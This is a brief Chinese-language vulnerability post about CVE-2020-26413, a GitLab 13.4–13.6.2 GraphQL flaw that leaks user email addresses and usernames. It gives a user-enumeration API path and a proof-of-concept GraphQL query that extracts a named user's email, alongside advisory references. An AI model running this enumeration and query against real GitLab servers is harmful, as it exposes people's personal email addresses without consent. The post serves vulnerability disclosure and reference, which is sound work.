GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413)-棉花糖会员站

GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413)

2021年7月20日发布

0570

# GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413)

GitLab中存在Graphql接口输入构造的数据时会泄露用户邮箱和用户名

影响版本：

GitLab 13.4 – 13.6.2

可以先通过接口进行遍历用户名，然后再枚举用户的邮箱…

“`
https://xxx/api/v4/users/x
“`

poc：

“`
http://xxx.xxx.xxx.xxx/-//graphql-explorer
query {
user(username:”root”){
email
username
}
}
“`

ref：

* https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
* https://nvd.nist.gov/vuln/detail/CVE-2020-26413
* https://gitlab.com/gitlab-org/gitlab/-/issues/244275

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容